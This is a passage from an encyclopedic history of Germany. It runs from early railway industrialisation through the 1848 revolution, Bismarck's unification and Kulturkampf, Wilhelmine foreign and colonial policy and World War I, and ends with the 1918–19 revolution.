Lacking a technological base at first, Germany imported its engineering and hardware from Britain. In many cities, the new railway shops were the centres of technological awareness and training, so that by 1850 Germany was self-sufficient in meeting the demands of railroad construction, and the railways were a major impetus for the growth of the new steel industry. Observers found that even as late as 1890, German engineering was inferior to Britain's. However, German unification in 1870 stimulated consolidation, nationalisation into state-owned companies, and further rapid growth. Unlike the situation in France, the goal was the support of industrialisation. Eventually numerous lines criss-crossed the Ruhr area and other industrial centers and provided good connections to the major ports of Hamburg and Bremen. By 1880, 9,400 locomotives pulled 43,000 passengers and 30,000 tons of freight a day.[259]
While there existed no national newspaper, the many states issued a great variety of printed media, though these rarely exceeded regional significance. A typical town had one or two outlets; urban centers such as Berlin and Leipzig had dozens. The audience was limited to a few per cent of male adults, chiefly from the aristocratic and upper middle class. Liberal publishers outnumbered conservative ones by a wide margin. Foreign governments bribed editors to guarantee a favorable image.[265] Censorship was strict, and the imperial government issued the political news that was supposed to be published. After 1871, strict press laws were enforced by Bismarck to contain the Socialists and hostile editors. Editors focused on political commentary, culture, the arts, high culture and the popular serialized novels. Magazines were politically more influential and attracted intellectual authors.[266]
19th-century artists and intellectuals were greatly inspired by the ideas of the French Revolution and by the great poets and writers Johann Wolfgang von Goethe, Gotthold Ephraim Lessing and Friedrich Schiller. The Sturm und Drang romantic movement was embraced, and emotion was given free expression in reaction to the perceived rationalism of the Enlightenment. Philosophical principles and methods were revolutionized by Immanuel Kant's paradigm shift. Ludwig van Beethoven was the most influential composer of the period from classical to Romantic music. His use of tonal architecture in such a way as to allow significant expansion of musical forms and structures was immediately recognized as bringing a new dimension to music. His later piano music and string quartets, especially, showed the way to a completely unexplored musical universe, and influenced Franz Schubert and Robert Schumann. In opera, a new Romantic atmosphere combining supernatural terror and melodramatic plot in a folkloric context was first successfully achieved by Carl Maria von Weber and perfected by Richard Wagner in his Ring Cycle. The Brothers Grimm collected folk stories into the popular Grimm's Fairy Tales and are ranked among the founding fathers of German studies inasmuch as they initiated work on the Deutsches Wörterbuch ("The German Dictionary"), the most comprehensive work on the German language.[267]
University professors developed international reputations, especially in the humanities such as history and philology, which brought a new historical perspective to the study of political history, theology, philosophy, language, and literature. With Georg Wilhelm Friedrich Hegel, Friedrich Wilhelm Joseph Schelling, Arthur Schopenhauer, Friedrich Nietzsche, Max Weber, Karl Marx and Friedrich Engels in philosophy, Friedrich Schleiermacher in theology and Leopold von Ranke in history, German scholars became famous. The University of Berlin, founded in 1810, became the world's leading university. Von Ranke, for example, professionalized history and set the world standard for historiography. By the 1830s mathematics, physics, chemistry, and biology had emerged as world-class sciences, led by Alexander von Humboldt in natural science and Carl Friedrich Gauss in mathematics. Young intellectuals often turned to politics, but their support for the failed revolution of 1848 forced many into exile.[217]
Two main developments reshaped religion in Germany. Across the land, there was a movement to unite the larger Lutheran and the smaller Reformed Protestant churches. The churches themselves brought this about in Baden, Nassau, and Bavaria. However, in Prussia King Frederick William III was determined to handle unification entirely on his own terms, without consultation. His goal was to unify the Protestant churches, and to impose a single standardized liturgy, organization, and even architecture. The long-term goal was to have fully centralized royal control of all the Protestant churches. In a series of proclamations over several decades the Church of the Prussian Union was formed, bringing together the more numerous Lutherans and the less numerous Reformed Protestants. The government of Prussia now had full control over church affairs, with the king himself recognized as the leading bishop. Opposition to unification came from the "Old Lutherans" in Silesia who clung tightly to the theological and liturgical forms they had followed since the days of Luther. The government attempted to crack down on them, so they went underground. Tens of thousands migrated to South Australia, and especially to the United States, where they formed the Missouri Synod, which is still in operation as a conservative denomination. Finally in 1845 a new king, Frederick William IV, offered a general amnesty and allowed the Old Lutherans to form a separate church association with only nominal government control.[268][269][270]
From the religious point of view of the typical Catholic or Protestant, major changes were underway toward a much more personalized religiosity that focused on the individual more than the church or the ceremony. The rationalism of the late 18th century faded away, and there was a new emphasis on the psychology and feeling of the individual, especially in terms of contemplating sinfulness, redemption, and the mysteries and revelations of Christianity. Pietistic revivals were common among Protestants. Among Catholics there was a sharp increase in popular pilgrimages. In 1844 alone, half a million pilgrims made a pilgrimage to the city of Trier in the Rhineland to view the Seamless Robe of Jesus, said to be the robe that Jesus wore on the way to his crucifixion. Catholic bishops in Germany had historically been largely independent of Rome, but now the Vatican exerted increasing control, a new "ultramontanism" of Catholics highly loyal to Rome.[271] A heated controversy erupted in 1837–1838 in the largely Catholic Rhineland over the religious education of children of mixed marriages, where the mother was Catholic and the father Protestant. The government passed laws to require that these children always be raised as Protestants, contrary to the Napoleonic law that had previously prevailed and allowed the parents to make the decision. The government put the Catholic Archbishop under house arrest. In 1840, the new King Frederick William IV sought reconciliation and defused the controversy by agreeing to most of the Catholic demands. However Catholic memories remained deep and led to a sense that Catholics always needed to stick together in the face of a hostile government.[272]
After the fall of Napoleon, Europe's statesmen convened in Vienna in 1815 for the reorganisation of European affairs, under the leadership of the Austrian Prince Metternich. The political principles agreed upon at this Congress of Vienna included the restoration, legitimacy and solidarity of rulers for the repression of revolutionary and nationalist ideas.
The German Confederation (German: Deutscher Bund) was founded, a loose union of 39 states (35 ruling princes and 4 free cities) under Austrian leadership, with a Federal Diet (German: Bundestag) meeting in Frankfurt am Main. It was a loose coalition that failed to satisfy most nationalists. The member states largely went their own way, and Austria had its own interests.
In 1819, a student radical assassinated the reactionary playwright August von Kotzebue, who had scoffed at liberal student organisations. In one of the few major actions of the German Confederation, Prince Metternich called a conference that issued the repressive Carlsbad Decrees, designed to suppress liberal agitation against the conservative governments of the German states.[273] The Decrees terminated the fast-fading nationalist fraternities (German: Burschenschaften), removed liberal university professors, and expanded the censorship of the press. The decrees began the "persecution of the demagogues", which was directed against individuals who were accused of spreading revolutionary and nationalist ideas. Among the persecuted were the poet Ernst Moritz Arndt, the publisher Johann Joseph Görres and the "Father of Gymnastics" Ludwig Jahn.[274]
In 1834, the Zollverein was established, a customs union between Prussia and most other German states, but excluding Austria. As industrialisation developed, the need for a unified German state with a uniform currency, legal system, and government became more and more obvious.
Growing discontent with the political and social order imposed by the Congress of Vienna led to the outbreak, in 1848, of the March Revolution in the German states. In May the German National Assembly (the Frankfurt Parliament) met in Frankfurt to draw up a national German constitution.
But the 1848 revolution turned out to be unsuccessful: King Frederick William IV of Prussia refused the imperial crown, the Frankfurt parliament was dissolved, the ruling princes repressed the risings by military force, and the German Confederation was re-established by 1850. Many leaders went into exile, including a number who went to the United States and became a political force there.[275]
The 1850s were a period of extreme political reaction. Dissent was vigorously suppressed, and many Germans emigrated to America following the collapse of the 1848 uprisings. Frederick William IV became extremely depressed and melancholic during this period, and was surrounded by men who advocated clericalism and absolute divine monarchy. The Prussian people once again lost interest in politics. Prussia not only expanded its territory but began to industrialize rapidly, while maintaining a strong agricultural base.
In 1857, the Prussian king Frederick William IV suffered a stroke, and his brother William served as regent until 1861, when he became King William I. Although conservative, William was very pragmatic. His most significant accomplishment was the naming of Otto von Bismarck as Prussian minister president in 1862. The cooperation of Bismarck, Defense Minister Albrecht von Roon, and Field Marshal Helmuth von Moltke set the stage for the military victories over Denmark, Austria, and France that led to the unification of Germany.[276][277]
In 1863–1864, disputes between Prussia and Denmark over Schleswig, which was not part of the German Confederation and which Danish nationalists wanted to incorporate into the Danish kingdom, escalated. The conflict led to the Second War of Schleswig in 1864. Prussia, joined by Austria, easily defeated Denmark and occupied Jutland. The Danes were forced to cede both the Duchy of Schleswig and the Duchy of Holstein to Austria and Prussia. The subsequent management of the two duchies led to tensions between Austria and Prussia. Austria wanted the duchies to become an independent entity within the German Confederation, while Prussia intended to annex them. The disagreement served as a pretext for the Seven Weeks War between Austria and Prussia that broke out in June 1866. In July, the two armies clashed at Sadowa-Königgrätz (Bohemia) in an enormous battle involving half a million men. Superior Prussian logistics and the superiority of the then-modern breech-loading needle guns over the slow muzzle-loading rifles of the Austrians proved essential for Prussia's victory. The battle also decided the struggle for hegemony in Germany, and Bismarck was deliberately lenient with a defeated Austria, which was to play only a subordinate role in future German affairs.[278][279]
After the Seven Weeks War, the German Confederation was dissolved and the North German Confederation (German: Norddeutscher Bund) was established under the leadership of Prussia. Austria was excluded, and its immense influence over Germany finally came to an end. The North German Confederation was a transitional organisation that existed from 1867 to 1871, between the dissolution of the German Confederation and the founding of the German Empire.[280]
Chancellor Otto von Bismarck determined the political course of the German Empire until 1890. He fostered alliances in Europe to contain France on the one hand and aspired to consolidate Germany's influence in Europe on the other. His principal domestic policies focused on the suppression of socialism and the reduction of the strong influence of the Roman Catholic Church on its adherents. He issued a series of anti-socialist laws, accompanied by a set of social laws that included universal health care, pension plans and other social security programs. His Kulturkampf policies were vehemently resisted by Catholics, who organized political opposition in the Center Party (Zentrum). German industrial and economic power had grown to match Britain's by 1900.
In 1888, the young and ambitious Kaiser Wilhelm II became emperor. He rejected advice from experienced politicians and ordered Bismarck's resignation in 1890. He opposed Bismarck's carefully considered foreign policy and was determined to pursue colonialist policies, as Britain and France had been doing for centuries. The Kaiser promoted the active colonization of Africa and Asia in the lands that were not already colonies of other European powers. In Europe the Kaiser took a mostly unilateral approach, allied only with the Austro-Hungarian Empire, and embarked on a dangerous naval arms race with Britain. His aggressive and ill-considered policies greatly contributed to the situation in which the assassination of the Austro-Hungarian crown prince would spark World War I.
Bismarck was the dominant personality not just in Germany but in all of Europe, and indeed the entire diplomatic world, from 1870 to 1890. Historians continue to debate his goals. Lothar Gall and Ernst Engelberg consider Bismarck a future-oriented modernizer. In sharp contrast, Jonathan Steinberg concluded that he was basically a traditional Prussian whose highest priorities were to reinforce the monarchy, the army, and the social and economic dominance of his own Junker class, thereby bearing responsibility for a tragic history after his removal in 1890.[281]
In 1868, the Spanish queen Isabella II was deposed in the Glorious Revolution, leaving the country's throne vacant. When Prussia suggested the Hohenzollern candidate, Prince Leopold, as successor, France vehemently objected. The matter evolved into a diplomatic scandal, and in July 1870 France resolved to end it in a full-scale war. The conflict was quickly decided, as Prussia, joined by the forces of a pan-German alliance, never gave up the tactical initiative. A series of victories in north-eastern France followed, and another French army group was simultaneously encircled at Metz. A few weeks later, the French army contingent under Emperor Napoleon III's personal command was finally forced to capitulate in the fortress of Sedan.[282][283] Napoleon was taken prisoner and a provisional government hastily proclaimed in Paris. The new government resolved to fight on and tried to reorganize the remaining armies while the Germans settled down to besiege Paris. The starving city surrendered in January 1871, and Jules Favre signed the surrender at Versailles. France was forced to pay indemnities of 5 billion francs and cede Alsace-Lorraine to Germany. This conclusion left the French national psyche deeply humiliated and further aggravated the French–German enmity.
During the Siege of Paris, the German princes assembled in the Hall of Mirrors of the Palace of Versailles on 18 January 1871, announced the establishment of the German Empire and proclaimed the Prussian King Wilhelm I German Emperor. The act unified all ethnic German states, with the exception of Austria, in the Little German solution of a federal economic, political and administrative unit. Bismarck was appointed to serve as Chancellor.
The new empire was a federal union of 25 states that varied considerably in size, demography, constitution, economy, culture, religion and socio-political development. However, even Prussia itself, which accounted for two-thirds of the territory as well as of the population, had emerged from the empire's periphery as a newcomer. It also faced colossal cultural and economic internal divisions. The Prussian provinces of Westphalia and the Rhineland, for example, had been under French control during the previous decades. The local people, who had benefited from the liberal civil reforms derived from the ideas of the French Revolution, had little in common with the predominantly rural communities in the authoritarian and disjointed Junker estates of Pomerania.[284] The inhabitants of the smaller territorial lands, especially in central and southern Germany, greatly rejected the Prussianized concept of the nation and preferred to associate such terms with their individual home state. The Hanseatic port cities of Hamburg, Bremen and Lübeck ranked among the most ferocious opponents of the so-called contract with Prussia. As advocates of free trade, they objected to Prussian ideas of economic integration and refused to sign the renewed Zollverein (Customs Union) treaties until 1888.[285] The Hanseatic merchants' overseas economic success corresponded with their globalist mindset. The citizens of Hamburg, whom Bismarck characterized as "extremely irritating" and the German ambassador in London as "the worst Germans we have", were particularly appalled by Prussian militarism and its unopposed growing influence.[286]
The Prusso-German authorities were aware of the need for integration concepts, as the results and the 52% voter turnout of the first imperial elections had clearly demonstrated. Historians increasingly argue that the nation-state was forged through empire.[287] National identity was expressed in bombastic imperial stone iconography and was to be achieved as an imperial people, with an emperor as head of state, and it was to develop imperial ambitions – domestic, European and global.[288][287]
Bismarck's domestic policies as Chancellor of Germany were based on his effort to universally adopt the idea of the Protestant Prussian state and achieve a clear separation of church and state in all imperial principalities. In the Kulturkampf (lit.: culture struggle) from 1871 to 1878, he tried to minimize the influence of the Roman Catholic Church and its political arm, the Catholic Centre Party, via the secularization of all education and the introduction of civil marriage, but without success. The Kulturkampf antagonised many Protestants as well as Catholics and was eventually abandoned. The millions of non-German imperial subjects, such as the Polish, Danish and French minorities, were left with no choice but to endure discrimination or accept the policies of Germanisation.[289][290]
The new Empire provided attractive top-level career opportunities for the national nobility in the various branches of the consular and civil services and the army. As a consequence, the aristocracy's near-total control of the civil sector guaranteed it a dominant voice in decision making in the universities and the churches. The 1914 German diplomatic corps consisted of 8 princes, 29 counts, 20 barons, 54 representatives of the lower nobility and a mere 11 commoners, who were recruited from elite industrialist and banking families. The consular corps employed numerous commoners, who, however, occupied positions of little to no executive power.[291] The Prussian tradition of reserving the highest military ranks for young aristocrats was adopted, and the new constitution put all military affairs under the direct control of the Emperor and beyond the control of the Reichstag.[292] With its large corps of reserve officers across Germany, the military strengthened its role as "the estate which upheld the nation", and historian Hans-Ulrich Wehler added: "it became an almost separate, self-perpetuating caste".[293]
Power was increasingly centralized among the 7,000 aristocrats who resided in the national capital of Berlin and neighboring Potsdam. Berlin's rapidly growing rich middle class copied the aristocracy and tried to marry into it. A peerage could permanently boost a rich industrial family into the upper reaches of the establishment.[294] However, the process also tended to work in the other direction, as the nobility became industrialists. For example, 221 of the 243 mines in Silesia were owned by nobles or by the King of Prussia himself.[295]
The middle class in the cities grew exponentially, although it never acquired the powerful parliamentary representation and legislative rights it had in France, Britain or the United States. The Association of German Women's Organizations (BDF) was established in 1894 to encompass the proliferating women's organizations that had emerged since the 1860s. From the beginning the BDF was a bourgeois organization, its members working toward equality with men in such areas as education, financial opportunities and political life. Working-class women were not welcome and were organized by the Socialists.[296]
The rising Socialist Workers' Party (later known as the Social Democratic Party of Germany, SPD) aimed to peacefully establish a socialist order through the transformation of existing political and social conditions. From 1878, Bismarck tried to oppose the growing social democratic movement by outlawing the party's organisation, its assemblies and most of its newspapers. Nonetheless, the Social Democrats grew stronger, and Bismarck initiated his social welfare program in 1883 in order to appease the working class.[297]
Bismarck built on a tradition of welfare programs in Prussia and Saxony that began as early as the 1840s. In the 1880s he introduced old-age pensions, accident insurance, medical care and unemployment insurance that formed the basis of the modern European welfare state. His paternalistic programs won the support of German industry because their goals were to win the support of the working classes for the Empire and to reduce the outflow of emigrants to America, where wages were higher but welfare did not exist.[298][299] Bismarck further won the support of both industry and skilled workers with his high tariff policies, which protected profits and wages from American competition, although they alienated the liberal intellectuals who wanted free trade.[300][301]
Bismarck would not tolerate any power outside Germany—as in Rome—having a say in domestic affairs. He launched the Kulturkampf ("culture war") against the power of the pope and the Catholic Church in 1873, but only in the state of Prussia. This gained strong support from German liberals, who saw the Catholic Church as the bastion of reaction and their greatest enemy. The Catholic element, in turn, saw in the National Liberals its worst enemy and formed the Center Party.[302]
Catholics, although nearly a third of the national population, were seldom allowed to hold major positions in the Imperial government or the Prussian government. After 1871, there was a systematic purge of the remaining Catholics; in the powerful interior ministry, which handled all police affairs, the only Catholic was a messenger boy. Jews were likewise heavily discriminated against.[303][304]
Most of the Kulturkampf was fought out in Prussia, but Imperial Germany passed the Pulpit Law, which made it a crime for any cleric to discuss public issues in a way that displeased the government. Nearly all Catholic bishops, clergy and laymen rejected the legality of the new laws and defiantly faced the increasingly heavy penalties and imprisonments imposed by Bismarck's government. Historian Anthony Steinhoff reports the casualty totals:
As of 1878, only three of eight Prussian dioceses still had bishops, some 1,125 of 4,600 parishes were vacant, and nearly 1,800 priests ended up in jail or in exile ... Finally, between 1872 and 1878, numerous Catholic newspapers were confiscated, Catholic associations and assemblies were dissolved, and Catholic civil servants were dismissed merely on the pretence of having Ultramontane sympathies.[305]
Bismarck underestimated the resolve of the Catholic Church and did not foresee the extremes that this struggle would attain.[306][307] The Catholic Church denounced the harsh new laws as anti-Catholic and mustered the support of its rank-and-file voters across Germany. In the following elections, the Center Party won a quarter of the seats in the Imperial Diet.[308] The conflict ended after 1879 because Pope Pius IX had died in 1878 and Bismarck broke with the Liberals to put his main emphasis on tariffs, foreign policy and attacking socialists. Bismarck negotiated with the conciliatory new pope, Leo XIII.[309] Peace was restored, the bishops returned and the jailed clerics were released. Laws were toned down or taken back, but the laws concerning education, civil registry of marriages and religious disaffiliation remained in place. The Center Party gained strength and became an ally of Bismarck, especially when he attacked socialism.[310]
Historians have cited the campaign against the Catholic Church, as well as a similar campaign against the Social Democratic Party, as leaving a lasting influence on the German consciousness, whereby national unity can be encouraged by excluding or persecuting a minority. This strategy, later referred to as "negative integration", set a tone of either being loyal to the government or being an enemy of the state, which directly influenced German nationalist sentiment and the later Nazi movement.[311]
Chancellor Bismarck's imperial foreign policy basically aimed at security and the prevention of a Franco-Russian alliance, in order to avoid a likely two-front war. The League of Three Emperors was signed in 1873 by Russia, Austria and Germany. It stated that republicanism and socialism were common enemies and that the three powers would discuss any matters concerning foreign policy. Bismarck needed good relations with Russia in order to keep France isolated. Russia fought a victorious war against the Ottoman Empire from 1877 to 1878 and attempted to establish the Principality of Bulgaria, which was strongly opposed by France and Britain in particular, as they were long concerned with the preservation of the Ottoman Empire and the containment of Russia at the Bosphorus Strait and the Black Sea. Germany hosted the Congress of Berlin in 1878, at which a more moderate peace settlement was agreed upon.
In 1879, Germany formed the Dual Alliance with Austria-Hungary, an agreement of mutual military assistance in the case of an attack by Russia, which was not satisfied with the agreement reached at the Congress of Berlin. The establishment of the Dual Alliance led Russia to take a more conciliatory stance, and in 1887 the so-called Reinsurance Treaty was signed between Germany and Russia. In it, the two powers agreed on mutual support in the case of a French attack on Germany or an Austrian attack on Russia. Russia turned its attention eastward to Asia and remained largely inactive in European politics for the next 25 years. In 1882, Italy, seeking supporters for its interests in North Africa against France's colonial policy, joined the Dual Alliance, which became the Triple Alliance. In return for German and Austrian support, Italy committed itself to assisting Germany in the case of a French attack.[312]
Bismarck had always argued that the acquisition of overseas colonies was impractical and that the burden of administration and maintenance would outweigh the benefits. Eventually he gave way, and a number of colonies were established in Africa (Togo, the Cameroons, German South-West Africa and German East Africa) and in Oceania (German New Guinea, the Bismarck Archipelago and the Marshall Islands). Bismarck also initiated the Berlin Conference of 1884–85, a formal meeting of the European colonial powers that sought to "establish international guidelines for the acquisition of African territory" (see Colonisation of Africa). Its outcome, the General Act of the Berlin Conference, can be seen as the formalisation of the "Scramble for Africa" and "New Imperialism".[313]
Emperor William I died in 1888. His son Frederick III, open to a more liberal political course, reigned for only ninety-nine days; stricken with throat cancer, he died three months after his accession. His son Wilhelm II followed him on the throne at the age of 29. Wilhelm rejected the liberal ideas of his parents and embarked on a conservative autocratic rule. Early on, he decided to replace the political elite, and in March 1890 he forced Chancellor Bismarck into retirement.[314] Following his principle of "Personal Regiment", Wilhelm was determined to exercise maximum influence on all government affairs.[315][316][317]
The young Kaiser Wilhelm set out to apply his imperialist ideas of Weltpolitik (German: [ˈvɛltpoliˌtiːk], "world politics"), as he envisaged a gratuitously aggressive political course to increase the empire's influence in and control over the world. After the removal of Bismarck, foreign policy was handled by the Kaiser and the Federal Foreign Office under Friedrich von Holstein. Wilhelm's increasingly erratic and reckless conduct was unmistakably related to character deficits and a lack of diplomatic skill.[318][319] The foreign office's rather sketchy assessment of the situation and its recommendations for the empire's most suitable course of action were:
first, that a long-term coalition between France and Russia had to fall apart; secondly, that Russia and Britain would never get together; and finally, that Britain would eventually seek an alliance with Germany.
Subsequently, Wilhelm refused to renew the Reinsurance Treaty with Russia. Russia promptly formed a closer relationship with France in the Dual Alliance of 1894, as both countries were concerned about Germany's new disagreeability. Furthermore, Anglo-German relations provided, from a British point of view, no basis for any consensus, as the Kaiser refused to divert from his aggressive, if somewhat desperate and anachronistic, imperial engagement and from the naval arms race in particular. Holstein's analysis proved to be mistaken on every point, and Wilhelm failed too, as he did not adopt a nuanced political dialogue. Germany was left gradually isolated and dependent on the Triple Alliance with Austria-Hungary and Italy. This agreement was hampered by differences between Austria and Italy, and in 1915 Italy left the alliance.[250]
In 1897, Admiral Alfred von Tirpitz, state secretary of the German Imperial Naval Office, devised his initially rather practical, yet nonetheless ambitious plan to build a sizeable naval force. Although it basically posed only an indirect threat as a fleet in being, Tirpitz theorized that its mere existence would force Great Britain, dependent on unrestricted movement on the seas, to agree to diplomatic compromises.[320] Tirpitz started the program of warship construction in 1898 and enjoyed the full support of Kaiser Wilhelm. Wilhelm entertained less rational ideas about the fleet, which circled around his romantic childhood dream to have a "fleet of [his] own some day" and his obsessive adherence to directing his policies along the lines of Alfred Thayer Mahan's work The Influence of Sea Power upon History.[321] In exchange for the East African island of Zanzibar, Germany had obtained the island of Heligoland in the German Bight from Britain in 1890, converted the island into a naval base and installed immense coastal defense batteries. Britain considered the imperial German endeavours a dangerous infringement on the century-old delicate balance of global affairs and trade on the seas under British control. The British, however, resolved to keep up the naval arms race and introduced the highly advanced new Dreadnought battleship concept in 1907. Germany quickly adopted the concept, and by 1910 the arms race had escalated again.[322][323]
In the First Moroccan Crisis of 1905, Germany nearly clashed with Britain and France when the latter attempted to establish a protectorate over Morocco. Kaiser Wilhelm II, upset at having not been informed about French intentions, declared his support for Moroccan independence in a highly provocative speech. The following year, a conference was held at which all of the European powers except Austria-Hungary (by now little more than a German satellite) sided with France. A compromise was brokered by the United States whereby the French relinquished some, but not all, control over Morocco.[324]
The Second Moroccan Crisis of 1911 saw another dispute over Morocco erupt when France tried to suppress a revolt there. Germany, still smarting from the previous quarrel, agreed to a settlement whereby the French ceded some territory in central Africa in exchange for Germany's renouncing any right to intervene in Moroccan affairs. This confirmed French control over Morocco, which became a full French protectorate in 1912.[325]
After 1890, the economy continued to industrialize and grow at an even higher rate than during the previous two decades, and it increased dramatically in the years leading up to World War I. Growth rates for the individual branches and sectors often varied considerably, and the periodical figures provided by the Kaiserliches Statistisches Amt ("Imperial Statistical Bureau") are often disputed or merely estimates. The classification and naming of internationally traded commodities and exported goods were still in progress, and the structure of production and export had changed over four decades. Published documents provide numbers such as: the proportion of goods manufactured by modern industry was approximately 25% in 1900, while the proportion of consumer-related products in manufactured exports stood at 40%.[326] Reasonably exact are the figures for total industrial production between 1870 and 1914, which increased by about 500%.[327]
Historian J. A. Perkins argued that more important than Bismarck's new tariff on imported grain was the introduction of the sugar beet as a main crop. Farmers quickly abandoned traditional, inefficient practices in favor of modern methods, including the use of artificial fertilizers and mechanical tools. Intensive methodical farming of sugar and other root crops made Germany the most efficient agricultural producer in Europe by 1914. Even so, farms were usually small in size and women did much of the field work. An unintended consequence was the increased dependence on migratory, especially foreign, labor.[328][329]
The basics of the modern chemical research laboratory layout and the introduction of essential equipment and instruments such as Bunsen burners, the Petri dish and the Erlenmeyer flask, along with task-oriented working principles and team research, originated in 19th-century Germany and France. The organisation of knowledge acquisition was further refined by the integration of laboratories into the research institutes of the universities and of industry. Germany acquired the leading role in the world's chemical industry by the late 19th century through strictly organized methodology. In 1913, the German chemical industry produced almost 90 per cent of the global supply of dyestuffs and sold about 80 per cent of its production abroad.[330][331]
Germany became Europe's leading steel-producing nation in the 1890s, thanks in large part to the protection from American and British competition afforded by tariffs and cartels.[332] The leading firm was "Friedrich Krupp AG Hoesch-Krupp", run by the Krupp family.[333] The merger of several major firms into the Vereinigte Stahlwerke (United Steel Works) in 1926 was modeled on the U.S. Steel corporation in the United States. The new company emphasized rationalization of management structures and modernization of the technology; it employed a multi-divisional structure and used return on investment as its measure of success. By 1913, American and German exports dominated the world steel market, as Britain slipped to third place.[334]
In machinery, iron and steel and other industries, German firms avoided cut-throat competition and instead relied on trade associations. Germany was a world leader because of its prevailing "corporatist mentality", its strong bureaucratic tradition and the encouragement of the government. These associations regulated competition and allowed small firms to function in the shadow of much larger companies.[335]
By the 1890s, German colonial expansion in Asia and the Pacific (Kiautschou in China, the Marianas, the Caroline Islands, Samoa) led to frictions with Britain, Russia, Japan and the United States.[336] The construction of the Baghdad Railway, financed by German banks, was designed to eventually connect Germany with the Turkish Empire and the Persian Gulf, but it also collided with British and Russian geopolitical interests.[337]
The largest colonial enterprises were in Africa.[338] The harsh treatment of the Nama and Herero in what is now Namibia in 1906–1907 led to charges of genocide against the Germans. Historians are examining the links and precedents between the Herero and Namaqua genocide and the Holocaust of the 1940s.[339][340][341]
Other territories claimed by the German colonial empire were: Bear Island (occupied in 1899),[342] the Togo hinterlands,[343] the German Somali Coast,[344] the Katanga territories, Pondoland (a failed attempt by Emil Nagel),[345] Nyassaland (Mozambique), southwestern Madagascar,[346] Santa Lucia Bay (South Africa) (a failed attempt in 1884),[347] and the Farasan Islands.[348]
Ethnic demands for nation states upset the balance between the empires that dominated Europe, leading to World War I, which started in August 1914. Germany stood behind its ally Austria in a confrontation with Serbia, but Serbia was under the protection of Russia, which was allied to France. Germany was the leader of the Central Powers, which included Austria-Hungary, the Ottoman Empire and later Bulgaria; arrayed against them were the Allies, consisting chiefly of Russia, France, Britain and, from 1915, Italy.
In explaining why neutral Britain went to war with Germany, historian Paul M. Kennedy recognized that it was critical that Germany had become economically more powerful than Britain, but he downplays the disputes over economic trade imperialism, the Baghdad Railway, confrontations in Central and Eastern Europe, highly charged political rhetoric and domestic pressure groups. Germany's reliance time and again on sheer power, while Britain increasingly appealed to moral sensibilities, played a role, especially in the view of the invasion of Belgium as either a necessary military tactic or a profound moral crime. The German invasion of Belgium was not important in itself, because the British decision had already been made and the British were more concerned with the fate of France. Kennedy argues that by far the main reason was London's fear that a repeat of 1870 – when Prussia and the German states smashed France – would mean that Germany, with a powerful army and navy, would control the English Channel and northwest France. British policy makers insisted that that would be a catastrophe for British security.[349]
In the west, Germany sought a quick victory by encircling Paris using the Schlieffen Plan. The plan failed due to Belgian resistance, Berlin's diversion of troops, and very stiff French resistance on the Marne, north of Paris. The Western Front became an extremely bloody battleground of trench warfare. The stalemate lasted from 1914 until early 1918, with ferocious battles that moved forces a few hundred yards at best along a line that stretched from the North Sea to the Swiss border. The British imposed a tight naval blockade in the North Sea which lasted until 1919, sharply reducing Germany's overseas access to raw materials and foodstuffs. Food scarcity became a serious problem by 1917.[350] The United States joined the Allies in April 1917. The entry of the United States into the war – following Germany's declaration of unrestricted submarine warfare – marked a decisive turning point against Germany.[351]
Total casualties on the Western Front were 3,528,610 killed and 7,745,920 wounded.[352]
The fighting on the Eastern Front was more wide open. In the east, there were decisive victories against the Russian army: the trapping and defeat of large parts of the Russian contingent at the Battle of Tannenberg, followed by huge Austrian and German successes. The breakdown of Russian forces – exacerbated by the internal turmoil caused by the 1917 Russian Revolution – led to the Treaty of Brest-Litovsk, which the Bolsheviks were forced to sign on 3 March 1918 as Russia withdrew from the war. It gave Germany control of Eastern Europe. Spencer Tucker says, "The German General Staff had formulated extraordinarily harsh terms that shocked even the German negotiator."[353] When Germany later complained that the Treaty of Versailles of 1919 was too harsh on it, the Allies responded that it was more benign than Brest-Litovsk.[354]
By defeating Russia in 1917, Germany was able to bring hundreds of thousands of combat troops from the east to the Western Front, giving it a numerical advantage over the Allies. By retraining the soldiers in new storm-trooper tactics, the Germans expected to unfreeze the battlefield and win a decisive victory before the American army arrived in strength.[355] However, the spring offensives all failed, as the Allies fell back and regrouped and the Germans lacked the reserves necessary to consolidate their gains. In the summer, with the Americans arriving at 10,000 a day and the German reserves exhausted, it was only a matter of time before multiple Allied offensives destroyed the German army.[356]
Although war had not been expected in 1914, Germany rapidly mobilized its civilian economy for the war effort, but the economy was handicapped by the British blockade, which cut off food supplies.[357]
Conditions on the home front deteriorated rapidly, with severe food shortages reported in all urban areas. The causes included the transfer of many farmers and food workers into the military, an overburdened railroad system, shortages of coal, and especially the British blockade that cut off imports from abroad. The winter of 1916–1917 was known as the "turnip winter", because that vegetable, usually fed to livestock, was used by people as a substitute for potatoes and meat, which were increasingly scarce. Thousands of soup kitchens were opened to feed the hungry, who grumbled that the farmers were keeping the food for themselves. Even the army had to cut the rations for soldiers.[358] The morale of both civilians and soldiers continued to sink, according to historian William H. McNeill.
1918 was the year of the deadly Spanish flu pandemic, which struck hard at a population weakened by years of malnutrition.
In October 1918, General Ludendorff, who wanted to protect the reputation of the Imperial Army by placing responsibility for the capitulation on the democratic parties and the Imperial Reichstag, pushed for the government to be democratised. A new chancellor was appointed, members of the Reichstag's majority parties were brought into the cabinet for the first time, and the constitution was modified.[360] The moves did not, however, satisfy either the Allies or the majority of German citizens.
The German revolution of 1918–1919 began on 3 November with a sailors' mutiny at Kiel which spread rapidly and all but bloodlessly across Germany. Within a week, workers' and soldiers' councils were in control of government and military institutions across most of the Reich.[361] On 9 November, Germany was declared a republic. The following day, the Council of the People's Deputies, formed from members of Germany's two main socialist parties, began acting as the provisional government. By the end of the month, all of Germany's ruling monarchs, including Emperor Wilhelm II, who had fled into exile in the Netherlands, had been forced to abdicate.[362]
In early January 1919, the Spartacist uprising led by the newly founded Communist Party of Germany attempted to take power in Berlin, but it was quashed by government and Freikorps troops. Into the spring there were additional violently suppressed efforts to push the revolution further in the direction of a council republic, such as the short-lived local soviet republics, notably in Bavaria (Munich). They too were put down with considerable loss of life.[363]
The revolution's end is generally set at 11 August 1919, the day the Weimar Constitution was signed following its adoption by the popularly elected Weimar National Assembly. Even though the widespread violence largely ended in 1919, the revolution remained in many ways incomplete. A large number of its opponents had been left in positions of power in the military and the Reich administration, and it failed to resolve the fracture on the Left between moderate socialists and communists. The Weimar Republic as a result was beset from the beginning by opponents from both the Left and – to a greater degree – the Right.[364]
